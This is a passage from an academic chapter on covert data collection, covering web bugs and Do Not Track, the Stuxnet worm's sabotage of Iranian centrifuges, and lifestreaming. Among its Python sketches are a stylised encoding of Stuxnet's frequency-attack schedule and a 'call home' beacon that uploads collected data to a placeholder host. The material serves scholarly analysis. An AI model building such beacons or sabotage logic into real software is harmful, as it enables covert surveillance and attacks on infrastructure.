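For illustration, honouring the flag is technically trivial, which underlines that the obstacle is a matter of consent and commercial will rather than engineering. The following is a minimal sketch in Python; the dict-style request headers and the function name are simplifying assumptions, not any framework's actual API. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Minimal sketch of honouring the 'do not track' flag: the browser
# sends the opt-out preference as an HTTP header (W3C, 2012), and a
# respectful server simply checks it before loading any trackers.
# The dict-style headers here are a simplifying assumption.
def should_track(request_headers):
    return request_headers.get('DNT') != '1'

if should_track({'DNT': '1'}):
    pass   # set cookies, fire web bugs, log the visit...
else:
    print('User opted out: no trackers loaded.')
&amp;lt;/pre&amp;gt; &lt;br /&gt;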
&lt;br /&gt;
One of the newer, and perhaps indicative, directions of travel for these web bugs is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service which claims to keep 'an eye on 1091622 websites'; it shows that this new code ecology is not a purely Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent to which users are just not aware of the subterranean depths of their computational devices, and the ability of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This is an issue helpfully illustrated by the next case study, of the Stuxnet worm, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection, and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise the fact that it is actually gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals, so that an infected system does not exhibit abnormal behavior and therefore does not raise an alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotage effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes it to erase itself after 24 June, 2012, hence hiding its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
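&lt;br /&gt;
The attack sequence Zetter describes is, in effect, a simple timed state machine. The following sketch encodes only the schedule given in the quotation above (frequencies in Hz, waits in days, durations in minutes); the callback functions are hypothetical stand-ins for the worm's manipulation of the frequency converters. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Sketch of the attack schedule described by Zetter (2011); the numeric values
# come from the quotation, everything else is a hypothetical simplification.
NOMINAL_HZ = 1064

# (days dormant, attack frequency in Hz, attack duration in minutes)
ATTACK_SEQUENCE = [
    (27, 1410, 15),   # overspeed, close to the IR-1 rotor's mechanical limit
    (27, 2, 50),      # drastic slow-down
]

def run(set_frequency, wait_days, wait_minutes):
    while True:
        for days, freq, minutes in ATTACK_SEQUENCE:
            wait_days(days)            # lie dormant; the plant appears normal
            set_frequency(freq)        # brief, damaging excursion
            wait_minutes(minutes)
            set_frequency(NOMINAL_HZ)  # restore the nominal frequency
&amp;lt;/pre&amp;gt;&lt;br /&gt;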
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable the warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general-purpose attack, but is designed to unload its digital warheads only under specific conditions, against a specific target. It is also remarkable in the way it disengages the interface - the screen the user sees - from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it, due to the complexities involved in testing such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexity and structure of the worm are such that at least thirty people would have had to work on it simultaneously to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one exploiting vulnerabilities that are neither public nor known to the developer of the attacked system - in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach of its attack, and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLC (Programmable Logic Controller) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely, using a number of software-based markers that give away the physical identity of the location. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) to disengage control systems from physical systems and to effect a stealth infection of the computer system that would fool the operators of the plant (the ‘man-in-the-middle attack’ described above). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of the rotors, leading to cracks and failures; the second, larger warhead, 417, manipulated valves in the centrifuge cascades, faking industrial process control sensor signals by modelling the centrifuges, which were grouped into cascades of 164 (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a) &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This analysis was a close reading and reconstruction of the programming logic: taking the machine code, disassembling it, and then attempting to convert it into the C programming language. The resulting code could then be examined for system function calls, timers, and data structures, in order to try to understand what it was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to Myrtus as 'an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
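&lt;br /&gt;
The disassembly step just described can be illustrated with the open-source Capstone disassembler. Capstone is my choice of tool here, not the one Langner's team used, and the byte string is an arbitrary x86 example rather than Stuxnet code. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Disassemble a few arbitrary x86 bytes into readable assembly (Capstone).
from capstone import Cs, CS_ARCH_X86, CS_MODE_32

code = b"\x55\x89\xe5\x83\xec\x10\xc9\xc3"  # a tiny function prologue/epilogue
md = Cs(CS_ARCH_X86, CS_MODE_32)

for insn in md.disasm(code, 0x1000):
    # From listings like this, analysts reconstruct C-like logic and then
    # look for system calls, timers and data structures (Langner, 2011).
    print("0x%x: %s %s" % (insn.address, insn.mnemonic, insn.op_str))
&amp;lt;/pre&amp;gt;&lt;br /&gt;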
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
*Iran - 52.2% &lt;br /&gt;
*Indonesia - 17.4% &lt;br /&gt;
*India - 11.3% &lt;br /&gt;
*Pakistan - 3.6% &lt;br /&gt;
*Uzbekistan - 2.6% &lt;br /&gt;
*Russia - 2.1% &lt;br /&gt;
*Kazakhstan - 1.3% &lt;br /&gt;
*Rest of World - 9.4%&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized against targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open, it is relatively trivial to decode it and so learn, in a very short time, techniques that would otherwise have taken many years to develop. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one whose purpose is the collection of data on industrial control systems and structures - a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increasing ability of software and code, via computational devices, to covertly monitor, control and mediate - both positively and negatively - is not just a matter of interventions designed to deceive the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems, as part of the notion of lifestreams and, more particularly, the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Self-monitoring technologies - known as lifestreaming, or the quantified self[11] - have expanded in recent years alongside the growth of ‘real-time stream’ platforms like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. It closes the loop of personal information online which, although it remains notionally private, is stored and accessed by corporations that wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea proposed by David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), who described them as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these as ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions in relation to the storage of documentation and texts. Today we are more likely to think of them as the ‘real-time streams’ and timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also micro-streams of short updates, epitomized by Twitter's text-message-sized, 140-character updates. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks and so forth are factored in. Stephen Wolfram was one of the first people to collect his own data systematically, starting with email in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that. Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &lt;br /&gt;
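&lt;br /&gt;
Freeman's description translates almost directly into a data structure. The following minimal sketch - the field names and methods are my own, not the Lifestreams system's actual interface - captures the core idea of a single time-ordered stream, stored once and filtered on demand. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Minimal sketch of a lifestream: one time-ordered stream of documents.
from dataclasses import dataclass, field
from datetime import datetime

@dataclass(order=True)
class Document:
    timestamp: datetime
    kind: str = field(compare=False)     # 'mail', 'photo', 'reminder', ...
    content: str = field(compare=False)

class Lifestream:
    def __init__(self):
        self.docs = []                   # tail of the list = the past

    def store(self, doc):                # every document lands in one stream
        self.docs.append(doc)
        self.docs.sort()                 # keep strict time order

    def substream(self, kind):           # 'organize information on demand'
        return [d for d in self.docs if d.kind == kind]

    def future(self, now):               # reminders and calendar items to come
        return [d for d in self.docs if d.timestamp &gt; now]
&amp;lt;/pre&amp;gt;&lt;br /&gt;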
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent, and in the context of reflexivity and self-knowledge it raises interesting questions. The data collected can also be relatively large in scale and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt prove revealing about our everyday patterns in the future.[12] &lt;br /&gt;
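&lt;br /&gt;
Surfacing patterns from such semi-structured records can begin with something as simple as a regular-expression pass. A small sketch, with an invented note format: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Pull a crude pattern (daily coffee purchases) out of semi-structured notes.
import re

notes = [
    "2012-03-01 08:12 bought coffee 2.40",
    "2012-03-01 13:05 lunch 7.90",
    "2012-03-02 08:20 bought coffee 2.40",
]

coffee = [n for n in notes if re.search(r"\bcoffee\b", n)]
print(len(coffee), "coffee purchases found")
&amp;lt;/pre&amp;gt;&lt;br /&gt;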
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device - especially if it contains the kind of sophisticated sensory circuitry that is common in smartphones - to log GPS location, direction, etc. This is where life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
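&lt;br /&gt;
In the JSON serialisation of this standard, the quoted example ‘Geraldine posted a photo to her album’ becomes a small, machine-readable record. The sketch below, written as a Python dictionary mirroring the shape of the JSON Activity Streams 1.0 serialisation, uses invented identifiers and URLs. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# 'Geraldine posted a photo to her album' as an activity record, mirroring
# the shape of the JSON Activity Streams 1.0 serialisation; values invented.
activity = {
    "published": "2011-02-10T15:04:55Z",
    "actor": {"objectType": "person",
              "id": "urn:example:person:geraldine",
              "displayName": "Geraldine"},
    "verb": "post",
    "object": {"objectType": "photo",
               "url": "http://example.org/photos/1"},
    "target": {"objectType": "photo-album",
               "displayName": "Geraldine's Album"},
}
&amp;lt;/pre&amp;gt;&lt;br /&gt;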
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case - in other words, for the individual user (or lifestreamer) and for the organization (such as Facebook) - the key is to pattern-match and compare details of the data, such as against a norm, a historical data set, or a population, group, or class of others.[13] &lt;br /&gt;
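&lt;br /&gt;
At its simplest, such pattern matching is a comparison of a new data point against a personal norm. A small sketch, with invented numbers: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Comparing today's value against a personal 'norm' - the simplest form of
# the pattern matching described above. All numbers are invented.
from statistics import mean, stdev

step_history = [8200, 7900, 10100, 6400, 9000, 8800, 7500]  # past daily steps
today = 3100

norm = mean(step_history)
z = (today - norm) / stdev(step_history)
print("today is %.1f standard deviations from your norm" % z)
# An aggregator (Facebook, say) runs the same comparison against a population,
# group, or class of others rather than one person's history.
&amp;lt;/pre&amp;gt;&lt;br /&gt;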
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms - the awarding of competitive points, badges, honours and positional goods more generally - this amounts to the construction of a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticons (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that make the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narrative, providing a stabilised web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation - and very productive knowledge can indeed be generated from this kind of research - it seems to me that we need to attend to the computationality represented in code and software in order to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems - carrying USB sticks, logging into email accounts and distant networks - create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs, learning our habits and preferences in real-time whilst secreting themselves within our computer systems, raises important questions. At the same time, users are actively downloading apps that advertise the fact that they collect this data, and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs, in many ways, are life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want particularly to draw attention to this passive-aggressive feature of computational agents that collect information: passive in quality - under the surface, relatively benign and silent - yet aggressive in their hoarding of data - monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of compactness as conciseness in expression. The etymology, from the Latin ''compact'' for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003). &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation is often offloaded to the ‘cloud’ - server computers designed specifically for the task and accessed via networks. Indeed, many viruses seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
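&lt;br /&gt;
‘Calling home’ is, at base, nothing more exotic than an HTTP request. A hedged sketch follows - the endpoint is a placeholder, not a real service, and real malware goes to great lengths to disguise such traffic: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Sketch of a compactant 'calling home': report status, upload a summary of
# collected data, and check for new instructions. Endpoint is a placeholder.
import json
from urllib import request

payload = json.dumps({"agent": "example-001", "status": "ok",
                      "observations": 1423}).encode("utf-8")
req = request.Request("http://example.org/beacon", data=payload,
                      headers={"Content-Type": "application/json"})
with request.urlopen(req) as resp:
    instructions = resp.read()  # the server may reply with an update
&amp;lt;/pre&amp;gt;&lt;br /&gt;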
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative relation to a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard - what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems: time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real - not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy: the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities, we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
